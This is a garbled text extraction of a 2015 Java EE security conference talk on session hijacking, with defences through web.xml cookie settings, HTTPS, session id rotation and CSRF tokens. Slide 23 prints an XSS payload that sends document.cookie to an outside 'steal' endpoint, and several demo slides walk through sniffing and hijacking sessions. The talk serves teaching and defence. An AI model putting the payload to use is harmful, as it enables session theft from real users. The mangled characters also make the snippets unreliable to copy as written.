• Home

  • Technology

  • Secure Authentication and Session Management in Java EE
40
Secure Authen+ca+on and Session Management in Java EE Patrycja Wegrzynowicz CTO, Yonita, Inc. Java Day Kiev 2015

Secure Authentication and Session Management in Java EE

Embed Size (px)

Citation preview

Page 1: Secure Authentication and Session Management in Java EE

SecureAuthen+ca+onandSessionManagement

inJavaEEPatrycjaWegrzynowicz

CTO,Yonita,Inc.JavaDayKiev2015

Page 2: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

AboutMe• 15+professionalexperience

• SoQwareengineer,architect,headofsoQwareR&D

• Authorandspeaker• JavaOne,Devoxx,JavaZone,TheServerSideJavaSymposium,Jazoon,OOPSLA,ASE,

others

• FinalizingPhDinComputerScience• FounderandCTOofYonita

• Bridgethegapbetweentheindustryandtheacademia• Automateddetec+onandrefactoringofsoQwaredefects

• Trainingsandcodereviews

• Security,performance,concurrency,databases

• TwiYer:@yonlabs

Page 3: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Agenda

• HTTP,session,OWASP• 4demostohijackasession• Bestprac+cesinJavaEE

Page 4: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Security Stories 2014/2015

#!/bin/bash

Page 5: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

HTTP

Page 6: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

WhatisWebSession?

• Sessioniden+fiesinterac+onswithoneuser• Uniqueiden+fierassociatedwitheveryrequest

• Cookie

• Header

• Parameter

• Hiddenfield

Page 7: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

OWASPTop10Risks

Page 8: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

SessionHijacking

• SessiontheQ• URL,sniffing,logs,XSS

• Sessionfixa+on• Sessionpredic+on

Page 9: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Demo:SessionExposedinURL

• Iwilllogintothesampleapplica+on• IwillpostalinkwithmysessionidonTwiYer

• @yonlabs

• Hijackmysession:)

Page 10: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

HowtoAvoidSessionIdinURL?

• Default:allowscookiesandURLrewri+ng• Defaultcookie,fallbackonURLrewri+ng

• Toembraceallusers

• Disabledcookiesinabrowser

• DisableURLrewri+nginanappserver• Appserverspecific

• Trackingmode• JavaEE6,web.xml

Page 11: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

web.xml

<!--JavaEE6,Servlet3.0--><session-config><tracking-mode>COOKIE</tracking-mode></session-config>

Page 12: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

SessionSniffing

• Howtofindoutacookie?• e.g.,networkmonitoringandpacketsniffing

• Howtouseacookie?• Browsers’pluginsandadd-ons(e.g.,CookieManagerforFirefox)

• Intercep+ngproxy(e.g.,OWASPZAP)

• DIY:writeyourowncode

Page 13: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Demo:SessionSniffing

• Youwilllogintothesampleapplica+on• Anynonemptyusername

• Please,usemeaningfulnames,thevic+mwillgetageecoin!

• Iwillmonitornetworktraffic• tcpdump

• Iwillhijackoneofyoursessions• CookieManager

Page 14: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

HowtoAvoidSessionExposureDuringTransport?

Page 15: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

HowtoAvoidSessionExposureDuringTransport?

Encrypt!UseHTTPS.

Page 16: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

web.xml<security-constraint><user-data-constraint><transport-guarantee>CONFIDENTIAL

</transport-guarantee></user-data-constraint>

</security-constraint>

Page 17: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

web.xml<!--JavaEE6,Servlet3.0--><session-config><cookie-config><secure>true</secure></cookie-config><tracking-mode>COOKIE</tracking-mode></session-config>

Page 18: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

SessionExposure• Transport

• Unencryptedtransport

• Client-side• XSS

• AYacksonbrowsers/OS

• Server-side• Logs

• Sessionreplica+on

• Memorydump

Page 19: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

HowtoStealaSessionifSecureTransportIsUsed?

Page 20: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

HowtoStealaSessionifSecureTransportIsUsed?

A3ackaclient!

Page 21: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Demo:SessionGrabbedbyXSS

• JavaScriptcodetostealacookie• Servlettologdownstolencookies• Vulnerableapplica+ontobeexploitedviainjectedJavaScriptcode(XSS)

Page 22: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Demo:SessionGrabbedbyXSS

• IwillstoremaliciousJavaScriptcodeintheapp• Throughwri+ngan“opinion”

• Logintothevulnerableapplica+on• hYps://demo.yonita.com:8181/session-xss/

• Anynonemptyusername

• Please,usemeaningfulnames,thevic+mwillgetageecoin!

• Click‚Viewothersopinions’page• Waitun+lIwillhijackyoursession:)

Page 23: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

JavaScripttoStealaCookie<script><!--hacker’sservice-->theQ=’hYp://demo.yonita.com/steal/steal?cookie=’<!--tobypassSameOriginPolicy-->image=newImage();image.src=theQ+document.cookie;</script>

Page 24: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

web.xml<!--JavaEE6,Servlet3.0--><session-config><cookie-config><hYp-only>true</hYp-only><secure>true</secure></cookie-config><tracking-mode>COOKIE</tracking-mode></session-config>

Page 25: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

SessionFixa+on:Scenario• Hackeropensawebpageofasysteminabrowser

• Newsessionini+alized

• Hackerwritesdownthesessionid• Hackerleavesthebrowseropen• Usercomesandlogsintotheapp

• Usesthesessionini+alizedbythehacker

• HackerusesthewriYendownsessionidtohijacktheuser’ssession

Page 26: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

SessionFixa+on:Solu+on

• ChangethesessionIDaQerasuccessfullogin• moregenerally:escala+onofprivileges

• JavaEE7(Servlet3.1)• HYpServletRequest.changeSessionId()

• JavaEE6–HYpSession.invalidate() –HYpServletRequest.getSession(true)

Page 27: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

SecureSessionManagementBestPrac+ces

• Random,unpredictablesessionid• Atleast16characters

• Securetransportandstorageofsessionid• CookiepreferredoverURLrewri+ng

• Cookieflags:secure,hYpOnly

• ConsistentuseofHTTPS(Howtoservesta+ccontent?)

• Don’tmixHTTPandHTTPSunderthesamedomain/cookiepath

• Don’tusetoobroadcookiepaths

Page 28: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

SecureAuthen+ca+onBestPrac+ces

• Sessioncrea+onanddestruc+on• NewsessionidaQerlogin

• LogoutbuYon

• Session+meouts:2”-5”forcri+calapps,15”-30”for typicalapps

• Sessionassociatedwiththeheadersofthefirstrequest• IP,User-Agent,…

• Iftheydon’tmatch,something’sgoingon(invalidate!)

Page 29: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

SecureAuthen+ca+onBestPrac+cescont.

• JavaEE• Declara+veauthen+ca+onimplementedusingannota+onsor

descriptors

• DoesnotforcenewsessionidaQerlogin(sessionfixa+onpossible,appserverspecific)

• Programma+cauthen+ca+on

• JavaEE7,Servlet3.1

• HYpServletRequest:authen+cate,login,logout

• Advancedflowsandrequirements

Page 30: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

SecureAuthen+ca+onBestPrac+cescont.

• Mychoice• Programma+cauthen+ca+onwithJavaEE7

• HYpServletRequest:authen+cate,login,logout

• Declara+veauthoriza+on

• web.xml

• @RolesAllowed,@PermitAll,@DenyAll

Page 31: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

WhatIfWeCan’tStealaCookie?

Page 32: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

WhatIfWeCan’tStealaCookie?

Wecans9lluseit!

Page 33: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Demo:CSRFtoUseaCookie• Iwilllogintotheapplica+on• Logintotheapplica+on

• hYps://demo.yonita.com:8181/session-csrf/

• Anynonemptyusername

• Please,usemeaningfulnames,thefirstvic+mwillgetageecoin!

• ClickthelinkandthebuYon‘Clickme’• hYps://demo.yonita.com:8181/aYack-csrf/

• Iwillcheckmyaccountbalance:)

https://demo.yonita.com:8181/session-csrf/
Page 34: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

CSRF:Solu+on

• Uniquetokenassociatedwitheachform• JavaEE(JSF):turnedonbydefault

• Anyothermodernframework

• RememberaboutREST/otherservices

Page 35: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Conclusion

Youareneversafe!

Page 36: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Con+nuousIntegra+on

Page 37: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Con+nuousRefactoring

Page 38: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Con+nuousLearning!

Page 39: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Con+nuousLearning

Afoolwithatooliss9llafool!

Page 40: Secure Authentication and Session Management in Java EE

(c) Patrycja Wegrzynowicz @yonlabs

Q&A

[email protected]

• TwiYer:@yonlabs

• Upcomingtrainings:Howtoa3ackandsecurewebappsinJava?Warszawa15-16.12.2015

mailto:[email protected]?subject=

Java EE 101

Java EE 101

Technology
Java EE Programming

Java EE Programming

Documents
Basic Java EE Book

Basic Java EE Book

Documents
Java EE Class

Java EE Class

Software
Java EE | Clean Code and Java EE 6 | Adam Bien

Java EE | Clean Code and Java EE 6 | Adam Bien

Technology
Java EE and Glassfish

Java EE and Glassfish

Technology
Table of Contents · Introduction: Java EE, Jakarta EE and Microprofile The Java Enterprise Edition (Java EE) is a superset of Java Standard Edition (Java SE) that dictates the basic

Table of Contents · Introduction: Java EE, Jakarta EE and Microprofile The Java Enterprise Edition (Java EE) is a superset of Java Standard Edition (Java SE) that dictates the basic

Documents
Java SE 8 for Java EE developers

Java SE 8 for Java EE developers

Education
Java EE Patterns Dan Bugariu. What is Java EE ? What is a Pattern ?

Java EE Patterns Dan Bugariu. What is Java EE ? What is a Pattern ?

Documents
Down and Dirty with Java EE 7 - Jfokus and Dirty with Java EE 7 Reza Rahman Java EE/GlassFish Evangelist Reza.Rahman@Oracle.com @reza_rahman

Down and Dirty with Java EE 7 - Jfokus and Dirty with Java EE 7 Reza Rahman Java EE/GlassFish Evangelist [email protected] @reza_rahman

Documents
Java Authentication SPI for Containers

Java Authentication SPI for Containers

Documents
Java EE - NUS Computing - Homeseer/book/2e/Ch04. JavaEE.pdf · Ch4: Java EE 6 The diagram above depicts the main architecture of Java EE. Java EE itself is a huge topic. For the next

Java EE - NUS Computing - Homeseer/book/2e/Ch04. JavaEE.pdf · Ch4: Java EE 6 The diagram above depicts the main architecture of Java EE. Java EE itself is a huge topic. For the next

Documents
Modern Java EE Design Patterns - pepa.holla.czpepa.holla.cz/.../uploads/2016/10/modern-java-ee-design-patterns.pdf · Markus Eisele Modern Java EE Design Patterns Building Scalable

Modern Java EE Design Patterns - pepa.holla.czpepa.holla.cz/.../uploads/2016/10/modern-java-ee-design-patterns.pdf · Markus Eisele Modern Java EE Design Patterns Building Scalable

Documents
Java EE and EJBs - UPapm/TDIN/docs/09ejbs.pdf · Java EE and EJBs Distributed Components in Java APM@FEUP. JavaEE and EJBs 2 General architecture of Java EE Java EE –Framework for

Java EE and EJBs - UPapm/TDIN/docs/09ejbs.pdf · Java EE and EJBs Distributed Components in Java APM@FEUP. JavaEE and EJBs 2 General architecture of Java EE Java EE –Framework for

Documents
Java Ee Bank

Java Ee Bank

Documents
Java EE 6 Update - JUG EE is pushed to greatly simplify the Java EE programming model…» Spring vs. Java EE and why I ... Java EE Spring EJB ... CDI Java SE Bootstrap and JPA

Java EE 6 Update - JUG EE is pushed to greatly simplify the Java EE programming model…» Spring vs. Java EE and why I ... Java EE Spring EJB ... CDI Java SE Bootstrap and JPA

Documents
What is tackled in the Java EE Security API (Java EE 8)

What is tackled in the Java EE Security API (Java EE 8)

Technology
Java EE Next

Java EE Next

Software
Java and Java EE Technologies

Java and Java EE Technologies

Documents
Enterprise Architectures - cvut.czJPA (EclipseLink)(2 Java EE stack) Websockets(2 Java EE stack) Servlets(2 Java EE stack) Spring(provides similar functionality as Enterprise Java

Enterprise Architectures - cvut.czJPA (EclipseLink)(2 Java EE stack) Websockets(2 Java EE stack) Servlets(2 Java EE stack) Spring(provides similar functionality as Enterprise Java

Documents
WAFFLE: Windows Authentication in Java

WAFFLE: Windows Authentication in Java

Technology
Java EE Operator's Guide (Java EE 6 Edition)Java EE Operator's Guide (Java EE 6 Edition) Preface Purpose of this Document This document introduces the environment builds and application

Java EE Operator's Guide (Java EE 6 Edition)Java EE Operator's Guide (Java EE 6 Edition) Preface Purpose of this Document This document introduces the environment builds and application

Documents
Java EE | Java EE 7: Developing for the Cloud | Arun Gupta

Java EE | Java EE 7: Developing for the Cloud | Arun Gupta

Technology
JAVA EE Productiv JAVA EE Productivity Report 2011

JAVA EE Productiv JAVA EE Productivity Report 2011

Documents
ESET Secure Authentication Java SDK

ESET Secure Authentication Java SDK

Documents
Java EE Security

Java EE Security

Documents
JAVA EE Productiv JAVA EE Productivity Report - ZeroTurnaround

JAVA EE Productiv JAVA EE Productivity Report - ZeroTurnaround

Documents
Token Authentication for Java Applications

Token Authentication for Java Applications

Software
Java EE 7: Developing for the Cloud Arun Gupta, Java EE & GlassFish Guy

Java EE 7: Developing for the Cloud Arun Gupta, Java EE & GlassFish Guy

Documents
Java EE 7: Whats New in the Java EE Platform @ Devoxx 2013

Java EE 7: Whats New in the Java EE Platform @ Devoxx 2013

Technology